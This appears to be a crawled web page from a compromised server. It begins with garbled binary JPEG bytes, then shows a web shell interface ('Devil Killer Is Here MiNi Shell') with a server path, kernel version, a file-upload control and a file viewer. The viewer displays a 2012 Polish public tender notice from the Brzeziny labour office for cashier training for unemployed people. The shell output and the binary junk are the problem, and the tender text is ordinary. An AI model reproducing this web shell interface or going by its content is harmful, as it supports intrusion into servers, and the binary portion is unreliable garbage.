JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/158003-N-2012.html

<p class="kh_header"><b>Brzeziny: usługa szkoleniowa 
Sprzedawca z obsługą kasy fiskalnej</b><br>
<b>Numer ogłoszenia: 158003 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sienkiewicza 11, 95-060 Brzeziny, woj. łódzkie, tel. 046 874-25-23, faks 046 874-11-80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-brzeziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa szkoleniowa 
Sprzedawca z obsługą kasy fiskalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa pod nazwą:
 Sprzedawca z obsługą kasy fiskalnej według kodu określonego we Wspólnym Słowniku Zamówień 80530000-8 Usługi szkolenia zawodowego dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Brzezinach finansowane ze środków Funduszu Pracy. 

1. Zakres tematyczny szkolenia:
- przepisy bhp obowiązujące w jednostce handlowej, 
- pierwsza pomoc
- zapoznanie z podstawowymi pojęciami obowiązującymi w jednostce handlowej,
- poznawanie otoczenia przedsiębiorstwa handlowego,
- marketing i reklama w handlu detalicznym,
- rodzaje punktów sprzedaży i ich charakterystyka,
- wyposażenie punktów sprzedaży i ich charakterystyka,
- zaopatrzenie i zakup towarów w jednostce handlu detalicznego,
- organizacja gospodarki magazynowej,
- rozmieszczanie  i przechowywanie towarów w jednostkach handlu detalicznego,
- obliczenia sklepowe,
- kształtowanie cen w jednostkach sprzedaży,
- inkasowanie należności za sprzedane produkty,
- wypełnianie dokumentacji związanej ze sprzedażą, fakturowanie sprzedaży zakupów, 
- obsługiwanie klienta z wykorzystaniem aktywnych metod sprzedaży, obsługa terminali kart płatniczych,
- zawieranie transakcji sprzedaży, 
- dekorowanie wnętrza sklepu i okna wystawowego, 
- obsługa kas fiskalnych.

Celem szkolenia będzie przygotowanie teoretyczne i praktyczne osób bezrobotnych, mających zamiar podjąć pracę w zawodzie sprzedawcy z obsługą kasy fiskalnej. 

2. Wykonawca zapozna uczestników szkolenia z programem i harmonogramem szkolenia. Wykonawca zapewni uczestnikom szkolenia materiały dydaktyczne zgodnie z zakresem tematycznym szkolenia, notatnik i długopis.
 Każdy uczestnik ma zapewniony dostęp do stanowiska szkoleniowego w całym procesie nauczania.
Wykonawca zapewni każdemu uczestnikowi szkolenia dostęp do stanowiska w trakcie zajęć praktycznych przy kasie fiskalnej oraz zapewni dostęp do stanowiska przy komputerze lub laptopie.

3. Liczba osób objętych szkoleniem  -  10.

4. Czas trwania kursu: do 6 tygodni ( do 30 dni roboczych);  planowany termin realizacji: sierpień-listopad 2012 r., ilość godzin na jednego uczestnika- 180 godzin zegarowych zajęć teoretycznych i praktycznych, w tym zajęć teoretycznych 80  godzin i zajęć praktycznych 100 godzin, w tym egzamin. Program szkolenia musi być realizowany według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu (godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, długość przerw może być ustalona w sposób elastyczny).
Program szkolenia musi być opracowany zgodnie z rozporządzeniem Ministra Pracy 
i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010r. Nr 177 poz. 1193 ze zm.)
   	Program szkolenia powinien wykorzystywać standardy kwalifikacji  zawodowych, modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez MPiPS znajdujących się na stronie internetowej www.standardyiszkolenia.praca.gov.pl.
5.Zajęcia będą odbywały się codziennie w dni robocze (od poniedziałku do piątku) 
na terenie miasta Brzeziny lub innej miejscowości zgodnie z Rozdziałem IV.2 SIWZ. Zakończenie zajęć nie później niż godz. 18.00.

6.Maksymalna liczba godzin szkoleniowych w ciągu jednego dnia nie może przekroczyć ośmiu. 

7. W czasie zajęć powinny być zapewnione właściwe, zgodne z obowiązującymi  przepisami warunki bezpieczeństwa i higieny pracy, odpowiednie warunki lokalowe 
i socjalne (środki higieny osobistej itp.).

8. Instytucja szkoleniowa zobowiązana jest do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje stypendium oraz którym przysługuje stypendium, o którym mowa w art. 41 ust. 3b ustawy o promocji zatrudnienia i instytucjach rynku pracy, czyli uczestnikom szkolenia, którzy w trakcie szkolenia podjęli zatrudnienie, inną pracę zarobkową lub działalność gospodarczą. 

 9. Instytucja szkoleniowa zapewni nadzór wewnętrzny, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia.

10. Szkolenie zakończy się egzaminem wewnętrznym.

 11. Wykonawca wystawi zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia Sprzedawca z obsługą kasy fiskalnej każdemu uczestnikowi szkolenia, 
 który pozytywnie zaliczy egzamin końcowy po ukończeniu szkolenia  (wykonawca zobowiązany jest załączyć do oferty wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji).

Zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskania kwalifikacji powinno zawierać, zgodnie z rozporządzeniem MPiPS  z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy, o ile przepisy odrębne nie stanowią inaczej :
-numer z rejestru,
-imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dowodu stwierdzającego tożsamość,
-nazwę instytucji szkoleniowej przeprowadzającego szkolenia,
-formę i nazwę szkolenia,
-okres trwania szkolenia,
-miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,
-tematy i wymiar godzin zajęć edukacyjnych,
-podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.

 12. Liczba osób objętych szkoleniem może ulec zwiększeniu lub zmniejszeniu
 w uzasadnionych przypadkach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są wpisani jako instytucja szkoleniowa do rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę instytucji szkoleniowej. Ocena spełniania warunku będzie dokonywana na podstawie załączonego do oferty oświadczenia o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy miejscowo Wojewódzki Urząd Pracy . 
Opis warunku udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tego warunku w oparciu o informacje zawarte w niżej w/w oświadczeniach i dokumentach będzie na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają doświadczenie w realizacji szkoleń-w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych i ciągłych również wykonują należycie 2 usługi szkoleniowe dla minimum 10 osób, w zakresie tematycznym zgodnym z przedmiotem zamówienia.
Ocena spełniania warunku będzie dokonywana na podstawie załączonego do oferty  wykazu wykonanych, a w przypadku świadczeń okresowych  i ciągłych również wykonywanych  usług szkoleniowych o tematyce zgodnej z przedmiotem zamówienia,  zrealizowanych 
 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie (np.: referencje). Wykonawca może polegać na wiedzy, doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany będzie udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Warunek uznany będzie za spełniony, jeżeli Wykonawca wykaże co najmniej 
2 usługi szkoleniowe dla minimum 10 osób, wykonane, a w przypadku świadczeń okresowych  i ciągłych również wykonywane należycie o tematyce zgodnej z przedmiotem zamówienia.
Opis warunku udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tego warunku w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach będzie na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonają usługę szkoleniową w dostosowanych ilościowo i jakościowo pomieszczeniu/ach, 
z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki oraz wyposażonym/ych w niezbędny sprzęt niezbędny do przeprowadzania zajęć  (sala/le do prowadzenia zajęć teoretycznych i praktycznych wyposażona/e w liczbę miejsc i stolików dla 10 osób, o powierzchni co najmniej 30 m2 (w przypadku dysponowania kilkoma salami do realizacji przedmiotowego szkolenia wymaga się, żeby każda z nich miała powierzchnię co najmniej 30 m2); wymaga się, żeby  sala/le wyposażona/e była/y w projektor lub rzutnik, tablicę klasyczną lub tablicę magnetyczną lub flipchart, oraz była/y wyposażona/e odpowiednio w kasy fiskalne (minimum 6 kas fiskalnych) i komputery z oprogramowaniem odpowiednim do zakresu przedmiotowego szkolenia (minimum 6 laptopów lub komputerów stacjonarnych) w trakcie realizacji zajęć praktycznych.
W przypadku Wykonawcy dysponującego pomieszczeniem, sprzętem nie będącym jego własnością, należy przedstawić pisemne zobowiązanie podmiotu udostępniającego pomieszczenie, sprzęt.

Ocena spełniania warunku będzie dokonywana na podstawie załączonego do oferty  wykazu narzędzi i urządzeń technicznych, dostępnych Wykonawcy usług w celu realizacji zamówienia - wykazu wyposażenia pomieszczeń, w której prowadzone będą zajęcia teoretyczne i praktyczne wraz z opisem warunków technicznych miejsca prowadzenia zajęć tj. warunków lokalowych, warunków BHP i innych, wykazu sprzętu do prowadzania zajęć teoretycznych i praktycznych wraz z informacją o podstawie dysponowania tymi zasobami.
W przypadku Wykonawcy dysponującego pomieszczeniem, sprzętem nie będącym jego własnością, należy przedstawić pisemne zobowiązanie podmiotu udostępniającego pomieszczenie, sprzęt.

Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże dysponowanie odpowiednim potencjałem technicznym opisanym w niniejszym punkcie.

Opis warunku udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tego warunku w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach będzie na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	do prowadzenia zajęć z wyjątkiem zajęć określonych w pkt b) i c) będą dysponować przynajmniej dwoma osobami posiadającymi odpowiednie kwalifikacje tj.: wykształcenie: co najmniej wyższe zawodowe, oraz które przeprowadziły zajęcia w co najmniej
 4 szkoleniach w zakresie sprzedawca z obsługą kasy fiskalnej, w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,

b)	co najmniej 1 osobą posiadającą odpowiednie kwalifikacje zawodowe do przeprowadzenia zajęć z zakresu bhp i pierwszej pomocy,

c)	 co najmniej 1 osobą do prowadzenia zajęć z obsługi kasy fiskalnej, posiadającą wykształcenie co najmniej średnie, posiadające odpowiednie uprawnienia/certyfikaty/zaświadczenia uprawniające do prowadzenia kursów/szkoleń 
z zakresu obsługi i programowania kas fiskalnych oraz która przeprowadziła zajęcia w co najmniej 4 szkoleniach w zakresie sprzedawca z obsługą kasy fiskalnej, w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,

Ocena spełniania warunku będzie dokonywana na podstawie załączonego do oferty  wykazu kadry dydaktycznej wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany będzie udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże dysponowanie osobami o odpowiednich kwalifikacjach.

Opis warunku udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tego warunku w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach będzie na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej
 i finansowej na podstawie złożonego przez niego oświadczenia z art. 22 ust. 1. Ustawy-Prawo zmówień publicznych.

Opis warunku udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tego warunku w oparciu o informację zawarte w niżej w/w oświadczeniach i dokumentach będzie na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełniony program szkolenia,
-oświadczenie o posiadaniu/nieposiadaniu certyfikatu jakości usług ISO i kserokopii certyfikatu jakości usług ISO jeśli Wykonawca posiada taki certyfikat oraz 
o posiadaniu/nieposiadaniu akredytacji Kuratorium Oświaty zgodnej z przedmiotem zamówienia, i kserokopii akredytacji Kuratorium Oświaty zgodnej z przedmiotem zamówienia jeśli Wykonawca posiada taką akredytację.
-wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oryginał pełnomocnictwa udzielonego osobom podpisującym ofertę, o ile prawo 
do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego, w przypadku spółki cywilnej pełnomocnictwa wraz z umową spółki,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - posiadanie karedytacji Kuratorium oświaty zgodnej z przedmiotem zamówienia - 5</li>
<li>3 - Posiadanie certyfikatu jakości usług ISO - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega zgodnie z art.145 ustawy, iż w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy  w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
W przypadku o którym mowa powyżej  Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.

Zamawiający dopuszcza możliwość zmiany umowy zgodnie z art. 144 ustawy w przypadku zaistnienia okoliczności, których nie można przewidzieć w chwili podpisania umowy
 lub jeżeli zmiany są korzystne dla Zamawiającego.
Zgodnie z art. 144 ustawy, Zamawiający zastrzega sobie prawo do zmiany daty realizacji szkolenia- z zastrzeżeniem, że szkolenie ma się zakończyć najpóźniej do 30 listopada 2012r., zmiany miejsca szkolenia, jeśli zostaną spełnione warunki  określone w załączniku nr 7 do SIWZ -wykaz narzędzi i urządzeń technicznych, dostępnych Wykonawcy usług w celu realizacji zamówienia - wykaz wyposażenia pomieszczeń, w której prowadzone będą zajęcia teoretyczne i praktyczne wraz z opisem warunków technicznych miejsca prowadzenia zajęć tj. warunków lokalowych warunków BHP i innych, wykaz sprzętu do prowadzania zajęć teoretycznych i praktycznych wraz z informacją o podstawie dysponowania tymi zasobami, załączonym do formularza oferty, zmiany kadry dydaktycznej (zmiana kadry dydaktycznej, jest dopuszczalna tylko w uzasadnionych przypadkach losowych, o ile zmiana nastąpi na kadrę spełniającą kryteria określone w Rozdziale V.1.3 a), b), c) SIWZ, zmiany osób uczestniczących w szkoleniu przed rozpoczęciem szkolenia, najpóźniej do 2 dnia szkolenia, zmiany wynagrodzenia w przypadku zwiększenia lub zmniejszenia liczby uczestników szkolenia, wówczas Zamawiający zapłaci cenę za  faktycznie skierowane  osoby na szkolenie, które uczestniczyły w szkoleniu i faktyczne godziny szkolenia tych osób (tj. mnożąc koszt osobogodziny szkolenia przez liczbę godzin szkolenia oraz przez ilość uczestników szkolenia). W związku, z tym 